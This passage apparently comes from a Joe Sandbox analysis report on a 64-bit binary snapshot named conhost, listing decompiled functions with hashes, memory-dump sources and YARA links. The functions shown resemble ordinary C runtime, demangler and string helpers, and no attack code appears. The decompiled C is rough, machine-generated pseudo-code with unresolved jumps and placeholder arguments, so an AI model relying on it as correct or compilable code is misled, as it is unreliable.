                        • Opcode ID: 977eb1a34e31103f10e9055bdcd37474cfb9060e756ebba1097c90a2cdde1493
                        • Instruction ID: 3f9159ed29404ea48bf32ed3785f86cf81aedef0dc7e30ff6fdb53b0d689fafe
                        • Opcode Fuzzy Hash: 977eb1a34e31103f10e9055bdcd37474cfb9060e756ebba1097c90a2cdde1493
                        • Instruction Fuzzy Hash: 52F0E930A1D603C6FBB54FB254830782299DF48716F680678C53EF52D4DE3CA4885221
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935CDEC9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 81COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00007FF67FF6935CDEC9() {
				signed int _t7;
				void* _t11;
				void* _t16;
				signed int** _t19;

				 *((intOrPtr*)(_t16 + 0x41909090)) =  *((intOrPtr*)(_t16 + 0x41909090)) + _t11;
				_t7 =  *( *_t19);
				if ((_t7 & 0x20ffffff) == 0x20474343) goto 0x935cdfb0;
				if (_t7 - 0xc0000096 > 0) goto 0x935cdf97;
				if (_t7 - 0xc000008b <= 0) goto 0x935cdf48;
				if (_t7 + 0x3fffff73 - 9 > 0) goto 0x935cdf38;
				goto __rax;
			}







                        0x7ff6935cdecb
                        0x7ff6935cded9
                        0x7ff6935cdeec
                        0x7ff6935cdef7
                        0x7ff6935cdf02
                        0x7ff6935cdf0c
                        0x7ff6935cdf1c

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: signal
                        • String ID: CCG
                        • API String ID: 1946981877-1584390748
                        • Opcode ID: 0668ec46346458bce498e757017dfe711463f7871f3ee1d7bd7ad3fffce19cc4
                        • Instruction ID: c5ae5ae898926174cf581a7a5b5f4617c1118e958ca8df5a504ce183fa03d1a9
                        • Opcode Fuzzy Hash: 0668ec46346458bce498e757017dfe711463f7871f3ee1d7bd7ad3fffce19cc4
                        • Instruction Fuzzy Hash: 4521B061E1D60646FE785269846333821C9FF8D32CF698AB6D93DE33D0DE6CE8C18211
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935D30C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48threadCOMMON
                        Download Yara Rule
                        C-Code - Quality: 66%
                        			E00007FF67FF6935D30C0(void* __edi, long long __rcx, void* __rdx, void* _a8, long long _a32, long long _a40, intOrPtr _a96) {
				intOrPtr _t9;
				long _t13;
				void* _t14;
				intOrPtr _t17;
				intOrPtr* _t22;
				long long _t24;

				_t9 =  *0x936023c0; // 0x0
				_a8 = __rcx;
				if (_t9 == 0) goto 0x935d315c;
				_t22 = _a8;
				if (_t22 != 0) goto 0x935d3110;
				r8d = GetCurrentThreadId();
				_pop(_t24);
				goto 0x935e0a20;
				asm("o16 nop [eax+eax]");
				E00007FF67FF6935D2550(__edi, _a96);
				E00007FF67FF6935D2550(__edi, _a96);
				_t17 =  *_t22;
				_t13 = GetCurrentThreadId();
				_t14 = E00007FF67FF6935D2550(_t17, _a96);
				_a40 = _t24;
				r9d = _t17;
				r8d = _t13;
				_a32 =  *((intOrPtr*)(_t22 + 0x28));
				0x935e0a20();
				return _t14;
			}









                        0x7ff6935d30c8
                        0x7ff6935d30ce
                        0x7ff6935d30d8
                        0x7ff6935d30de
                        0x7ff6935d30e6
                        0x7ff6935d30fa
                        0x7ff6935d3101
                        0x7ff6935d3105
                        0x7ff6935d310a
                        0x7ff6935d3115
                        0x7ff6935d3123
                        0x7ff6935d3128
                        0x7ff6935d312a
                        0x7ff6935d3137
                        0x7ff6935d313c
                        0x7ff6935d3141
                        0x7ff6935d3144
                        0x7ff6935d3147
                        0x7ff6935d3156
                        0x7ff6935d3164

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: CurrentThread
                        • String ID: T%p %d %s$T%p %d V=%0X H=%p %s
                        • API String ID: 2882836952-2059990036
                        • Opcode ID: dc1de9012fa21fc8e41161c0c1d3d78ff8af58678dd38c2bfadd6608a3e95863
                        • Instruction ID: 5ab57d4ba543249745c1f2f5dfcc341730f25ff3616206e8d68fb8fdc2bc7c18
                        • Opcode Fuzzy Hash: dc1de9012fa21fc8e41161c0c1d3d78ff8af58678dd38c2bfadd6608a3e95863
                        • Instruction Fuzzy Hash: 2D01A132B0870682E6319F67E8024AA6369FB8CB94F480176EE5CA7365EE3CE445C740
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935CE5D0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: _assertcalloc
                        • String ID: !dso || dso == &__dso_handle$C:/crossdev/src/mingw-w64-v8-git/mingw-w64-crt/crt/tls_atexit.c
                        • API String ID: 615528074-4180103562
                        • Opcode ID: 997d33b97b57c5b7e2d8e411824f605c6be887a0d2b9bc600b613865c56a2171
                        • Instruction ID: 050c21351b6dd1d2ff62f5b93c8115dce57fd03cabb37e99425707ebc3095cf2
                        • Opcode Fuzzy Hash: 997d33b97b57c5b7e2d8e411824f605c6be887a0d2b9bc600b613865c56a2171
                        • Instruction Fuzzy Hash: 47015E72B1860251FA758B55F8522B92298EF48784F8581B0DE1CE7795EE2CD9919340
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935CD5B0 Relevance: 6.3, APIs: 5, Instructions: 94stringCOMMON
                        Download Yara Rule
                        C-Code - Quality: 43%
                        			E00007FF67FF6935CD5B0(void* __rax, void* __rcx, void* __rdx, intOrPtr* __r8, intOrPtr* __r9) {
				intOrPtr _v48;
				long long _v56;
				long long _v64;
				char _v72;
				void* _t10;
				void* _t14;
				void* _t15;
				intOrPtr* _t28;
				intOrPtr* _t36;

				_t36 = __r8;
				_t28 = __r9;
				if (__rcx == 0) goto 0x935cd6a0;
				if (__rdx == 0) goto 0x935cd5db;
				if (__r8 == 0) goto 0x935cd6a0;
				_v72 = 0;
				_v64 = 0;
				_v56 = 0;
				_v48 = 0;
				if (E00007FF67FF6935CCB20(_t10, _t15, __rax, __rcx, 0x7ff6935c45b0,  &_v72) == 0) goto 0x935cd6e0;
				if (_v48 == 0) goto 0x935cd680;
				if (_v72 == 0) goto 0x935cd6fd;
				if (__rdx == 0) goto 0x935cd6d0;
				strlen(??);
				if (__rax -  *_t36 >= 0) goto 0x935cd6c0;
				_t14 = memcpy(??, ??, ??);
				free(??);
				if (_t28 == 0) goto 0x935cd66d;
				 *_t28 = 0;
				return _t14;
			}












                        0x7ff6935cd5be
                        0x7ff6935cd5c1
                        0x7ff6935cd5c7
                        0x7ff6935cd5d0
                        0x7ff6935cd5d5
                        0x7ff6935cd5e7
                        0x7ff6935cd5f0
                        0x7ff6935cd5f9
                        0x7ff6935cd602
                        0x7ff6935cd611
                        0x7ff6935cd622
                        0x7ff6935cd62c
                        0x7ff6935cd635
                        0x7ff6935cd63e
                        0x7ff6935cd646
                        0x7ff6935cd652
                        0x7ff6935cd65d
                        0x7ff6935cd665
                        0x7ff6935cd667
                        0x7ff6935cd67b

                        APIs
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: freememcpystrlen
                        • String ID:
                        • API String ID: 2208669145-0
                        • Opcode ID: 63170e71b3aefe088590c312e8055d4beb86fddca5082f947a9aa7bf25b6fed5
                        • Instruction ID: 4b22a57d97029a96c68a2ab71388bfee31ea26ee099e83fd30f7d5251ef1f50f
                        • Opcode Fuzzy Hash: 63170e71b3aefe088590c312e8055d4beb86fddca5082f947a9aa7bf25b6fed5
                        • Instruction Fuzzy Hash: E7318E22A0964241FEB66E11A61277B52D8FF4C79CF5841B1DE8EEB6C4DF3CA485C780
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935DC720 Relevance: 6.3, APIs: 4, Instructions: 321COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: memset
                        • String ID:
                        • API String ID: 2221118986-0
                        • Opcode ID: 2489395c034ba57bd35dde6236fff361f01b3e42c75a40a51da277e3b9fff7c5
                        • Instruction ID: e8b552365437747afb3ca05289044c9a71f602563508f5a978f4ca0e673042c5
                        • Opcode Fuzzy Hash: 2489395c034ba57bd35dde6236fff361f01b3e42c75a40a51da277e3b9fff7c5
                        • Instruction Fuzzy Hash: 77C1D46AE1924146F7318B25800633A2AA9FF087A8F1442B6DE7EF77C5CE3DF9418740
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935D9B70 Relevance: 6.3, APIs: 4, Instructions: 319COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: memset
                        • String ID:
                        • API String ID: 2221118986-0
                        • Opcode ID: 9fde42beae9ca2f6261fd7f56039f3d725da2ad692f88566958c967d768da1c9
                        • Instruction ID: 8146b632ba3478ea6ff64b76f5aadbe31a9e1fd607bcafcb8468e7a4f633c394
                        • Opcode Fuzzy Hash: 9fde42beae9ca2f6261fd7f56039f3d725da2ad692f88566958c967d768da1c9
                        • Instruction Fuzzy Hash: 7BC1D663E0824246E7715A25800237A2ADAFF49758F1942B6DE3DAB7CDCE3DE845C741
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935CCB20 Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 315stringCOMMON
                        Download Yara Rule
                        C-Code - Quality: 28%
                        			E00007FF67FF6935CCB20(signed int __eax, signed int __edx, void* __rax, signed char* __rcx, long long __rdx, long long __r8) {
				signed int _t83;
				void* _t86;
				int _t89;
				signed int _t91;
				void* _t94;
				signed int _t108;
				void* _t111;
				void* _t113;
				long long _t137;
				signed long long _t140;
				unsigned long long _t160;
				long long* _t165;
				void* _t166;
				void* _t167;
				void* _t168;
				void* _t169;
				void* _t170;
				signed long long _t182;
				void* _t184;
				signed char* _t188;
				void* _t189;
				signed char* _t190;

				_t167 = _t166 - 0x218;
				_t165 = _t167 + 0x80;
				r15d =  *__rcx & 0x000000ff;
				_t111 = r15b - 0x5f;
				if (_t111 == 0) goto 0x935cce90;
				asm("repe cmpsb");
				asm("sbb al, 0x0");
				r14d = 0;
				if ((__eax & 0xffffff00 | _t111 > 0x00000000) != 0) goto 0x935ccba0;
				_t113 = (__rcx[8] & 0x000000ff) - 0x24 - 0x3b;
				if (_t113 > 0) goto 0x935ccba0;
				asm("dec eax");
				if (_t113 >= 0) goto 0x935ccba0;
				_t83 = __rcx[9] & 0x000000ff;
				if (_t83 == 0x44) goto 0x935cced0;
				if (_t83 == 0x49) goto 0x935cced0;
				strlen(??);
				 *((long long*)(_t165 - 0x50)) = __rcx;
				 *((intOrPtr*)(_t165 - 0x40)) = 0x11;
				r8d = __rax + __rax;
				 *((long long*)(_t165 - 0x48)) = __rax + __rcx;
				 *(_t165 - 0x38) = __rcx;
				 *(_t165 - 0x24) = r8d;
				 *((intOrPtr*)(_t165 - 0x28)) = 0;
				 *((intOrPtr*)(_t165 - 0x14)) = __edx;
				 *((intOrPtr*)(_t165 - 0x18)) = 0;
				 *((long long*)(_t165 - 0x10)) = 0;
				 *((long long*)(_t165 - 8)) = 0;
				 *_t165 = 0;
				if (r8d - 0x800 > 0) goto 0x935cce73;
				_t86 = E00007FF67FF6935CEA40(0);
				_t168 = _t167 - (r8d << 5);
				_t160 = _t168 + 0x27;
				E00007FF67FF6935CEA40(_t86);
				_t169 = _t168 - (0x0000000f + __edx * 0x00000008 & 0xfffffff0);
				 *(_t165 - 0x30) = _t160 & 0xfffffff8;
				_t137 = _t169 + 0x20;
				 *((long long*)(_t165 - 0x20)) = _t137;
				if (r14d == 1) goto 0x935ccea8;
				_t23 = _t189 - 2; // -2
				if (_t23 - 1 > 0) goto 0x935cceb8;
				_t190 =  &(__rcx[0xb]);
				 *(_t165 - 0x38) = _t190;
				if (__rcx[0xb] != 0x5f) goto 0x935ccc78;
				if (__rcx[0xc] == 0x5a) goto 0x935ccff2;
				 *(_t165 - 0x60) = _t160 >> 3;
				 *(_t165 - 0x54) = r8d;
				_t89 = strlen(??);
				r8d =  *(_t165 - 0x54);
				_t182 =  *(_t165 - 0x60);
				if (r8d <= 0) goto 0x935ccfb3;
				 *((long long*)(4 + _t182 * 8)) = 0;
				 *((intOrPtr*)(_t165 - 0x28)) = 1;
				if (_t89 <= 0) goto 0x935ccfb3;
				 *(_t182 * 8) = 0;
				 *(0x10 + _t182 * 8) = _t190;
				 *(0x18 + _t182 * 8) = _t89;
				r9d = 0;
				E00007FF67FF6935C4190();
				strlen(??);
				_t188 =  &(( *(_t165 - 0x38))[_t137]);
				 *(_t165 - 0x38) = _t188;
				_t91 =  *_t188 & 0x000000ff;
				if (_t91 != 0) goto 0x935cceae;
				if (_t137 == 0) goto 0x935cceae;
				 *((long long*)(_t165 + 0x120)) = __rdx;
				_t184 = _t165 + 0x10;
				 *((char*)(_t165 + 0x118)) = 0;
				 *((long long*)(_t165 + 0x110)) = 0;
				 *((long long*)(_t165 + 0x128)) = __r8;
				 *((long long*)(_t165 + 0x130)) = 0;
				 *((long long*)(_t165 + 0x138)) = 0;
				 *((long long*)(_t165 + 0x140)) = 0;
				 *((long long*)(_t165 + 0x148)) = 0;
				 *((intOrPtr*)(_t165 + 0x150)) = 0;
				 *((long long*)(_t165 + 0x158)) = 0;
				 *((long long*)(_t165 + 0x160)) = 0;
				 *((long long*)(_t165 + 0x168)) = 0;
				 *((long long*)(_t165 + 0x170)) = 0;
				 *((long long*)(_t165 + 0x178)) = 0;
				E00007FF67FF6935C4470();
				if ( *((intOrPtr*)(_t165 + 0x144)) - 0x7ff > 0) goto 0x935ccdcc;
				 *((intOrPtr*)(_t165 + 0x144)) = 0;
				 *((long long*)(_t165 + 0x180)) = 0;
				_t108 =  *(_t165 + 0x17c) * _t91;
				_t139 =  <=  ? _t184 :  *((intOrPtr*)(_t165 + 0x16c));
				_t140 = ( <=  ? _t184 :  *((intOrPtr*)(_t165 + 0x16c))) << 4;
				 *(_t165 + 0x17c) = _t108;
				E00007FF67FF6935CEA40(_t91);
				_t170 = _t169 - _t140;
				_t94 =  >  ? _t108 : 1;
				E00007FF67FF6935CEA40(_t140);
				 *((long long*)(_t165 + 0x160)) = _t170 + 0x20;
				 *((long long*)(_t165 + 0x170)) = _t170 - (_t140 << 4) + 0x20;
				E00007FF67FF6935CB3A0(_t184, _t137);
				 *((char*)(_t165 +  *((intOrPtr*)(_t165 + 0x110)) + 0x10)) = 0;
				 *((intOrPtr*)(_t165 + 0x120))();
				return 0 |  *((intOrPtr*)(_t165 + 0x140)) == 0x00000000;
			}

























                        0x7ff6935ccb2c
                        0x7ff6935ccb33
                        0x7ff6935ccb3b
                        0x7ff6935ccb48
                        0x7ff6935ccb4c
                        0x7ff6935ccb61
                        0x7ff6935ccb66
                        0x7ff6935ccb68
                        0x7ff6935ccb6d
                        0x7ff6935ccb77
                        0x7ff6935ccb79
                        0x7ff6935ccb85
                        0x7ff6935ccb89
                        0x7ff6935ccb8b
                        0x7ff6935ccb92
                        0x7ff6935ccb9a
                        0x7ff6935ccba3
                        0x7ff6935ccba8
                        0x7ff6935ccbb2
                        0x7ff6935ccbb9
                        0x7ff6935ccbbd
                        0x7ff6935ccbc3
                        0x7ff6935ccbc7
                        0x7ff6935ccbcb
                        0x7ff6935ccbd2
                        0x7ff6935ccbd5
                        0x7ff6935ccbdc
                        0x7ff6935ccbe4
                        0x7ff6935ccbec
                        0x7ff6935ccbfb
                        0x7ff6935ccc0b
                        0x7ff6935ccc10
                        0x7ff6935ccc16
                        0x7ff6935ccc32
                        0x7ff6935ccc37
                        0x7ff6935ccc3a
                        0x7ff6935ccc3e
                        0x7ff6935ccc43
                        0x7ff6935ccc4b
                        0x7ff6935ccc51
                        0x7ff6935ccc58
                        0x7ff6935ccc5e
                        0x7ff6935ccc67
                        0x7ff6935ccc6b
                        0x7ff6935ccc72
                        0x7ff6935ccc7b
                        0x7ff6935ccc7f
                        0x7ff6935ccc83
                        0x7ff6935ccc88
                        0x7ff6935ccc8c
                        0x7ff6935ccc93
                        0x7ff6935ccc99
                        0x7ff6935ccca5
                        0x7ff6935cccae
                        0x7ff6935cccb4
                        0x7ff6935cccc4
                        0x7ff6935ccccc
                        0x7ff6935ccce3
                        0x7ff6935ccce9
                        0x7ff6935cccf8
                        0x7ff6935cccfd
                        0x7ff6935ccd00
                        0x7ff6935ccd04
                        0x7ff6935ccd0b
                        0x7ff6935ccd14
                        0x7ff6935ccd1a
                        0x7ff6935ccd21
                        0x7ff6935ccd2b
                        0x7ff6935ccd32
                        0x7ff6935ccd3d
                        0x7ff6935ccd44
                        0x7ff6935ccd4f
                        0x7ff6935ccd5a
                        0x7ff6935ccd65
                        0x7ff6935ccd70
                        0x7ff6935ccd7a
                        0x7ff6935ccd85
                        0x7ff6935ccd90
                        0x7ff6935ccd9b
                        0x7ff6935ccda6
                        0x7ff6935ccdb1
                        0x7ff6935ccdc0
                        0x7ff6935ccdc2
                        0x7ff6935ccde1
                        0x7ff6935ccdec
                        0x7ff6935ccdf1
                        0x7ff6935ccdf5
                        0x7ff6935ccdf9
                        0x7ff6935ccdff
                        0x7ff6935cce04
                        0x7ff6935cce0b
                        0x7ff6935cce19
                        0x7ff6935cce26
                        0x7ff6935cce38
                        0x7ff6935cce3f
                        0x7ff6935cce58
                        0x7ff6935cce5d
                        0x7ff6935cce86

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: strlen
                        • String ID: _GLOBAL_
                        • API String ID: 39653677-770460502
                        • Opcode ID: 2e03a71ffbb1b7018c88c7eb3eef0ff1febdb7a68f7cec7d988261e03cd7fce3
                        • Instruction ID: 9044a41780077864397c6fb07c412a75a93e6c18b3160cf321aa1ebd0c7b52f5
                        • Opcode Fuzzy Hash: 2e03a71ffbb1b7018c88c7eb3eef0ff1febdb7a68f7cec7d988261e03cd7fce3
                        • Instruction Fuzzy Hash: 3BD10336A086D689FB708B6598163FE3BA9EB0978CF444071DE5DAB789CF3C9546C700
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935DCC60 Relevance: 6.2, APIs: 4, Instructions: 243COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4e03036d182d164cb470424b579f1f0aeffcd990de4ee17112ff7d9909a462c5
                        • Instruction ID: fa308737ae9dae42f54fb0088ab1034f46f5b1186f309a60f8a617b53436770d
                        • Opcode Fuzzy Hash: 4e03036d182d164cb470424b579f1f0aeffcd990de4ee17112ff7d9909a462c5
                        • Instruction Fuzzy Hash: B091C676E1928646E7758F25C5023796A99FB09B94F158272CE2DEB3C8DE3CF841C740
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935DA0B0 Relevance: 6.2, APIs: 4, Instructions: 241COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: dea3cf285f77b3662a544ef16324cd2b14bec5ba05b93c8c5b0ed29a3849d8e7
                        • Instruction ID: 953e5edb8f68d549bee76cec28b8474d9e768877ddebd9fe0d1028bfdb95d913
                        • Opcode Fuzzy Hash: dea3cf285f77b3662a544ef16324cd2b14bec5ba05b93c8c5b0ed29a3849d8e7
                        • Instruction Fuzzy Hash: 0F91C772E0928286E7759F29810233B679DFB49B94F548272CE29A77C4DF3DE8418742
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935E8F80 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 192COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00007FF67FF6935E8F80(void* __eflags, long long* __rcx, signed char* __rdx, long long __r8) {
				long long _v32;
				signed int _t6;
				long long _t15;

				_t15 = __rcx + 0x10;
				 *__rcx = _t15;
				if (__eflags == 0) goto 0x935e8fa5;
				if (__rdx == 0) goto 0x935e9014;
				_v32 = __r8;
				if (__r8 - 0xf > 0) goto 0x935e8fe0;
				if (__r8 != 1) goto 0x935e8fd0;
				_t6 =  *__rdx & 0x000000ff;
				 *(__rcx + 0x10) = _t6;
				 *((long long*)(__rcx + 8)) = __r8;
				 *((char*)(_t15 + __r8)) = 0;
				return _t6;
			}






                        0x7ff6935e8f8e
                        0x7ff6935e8f98
                        0x7ff6935e8f9e
                        0x7ff6935e8fa3
                        0x7ff6935e8fa5
                        0x7ff6935e8fae
                        0x7ff6935e8fb4
                        0x7ff6935e8fb6
                        0x7ff6935e8fbb
                        0x7ff6935e8fbe
                        0x7ff6935e8fc2
                        0x7ff6935e8fce

                        Strings
                        Memory Dump Source
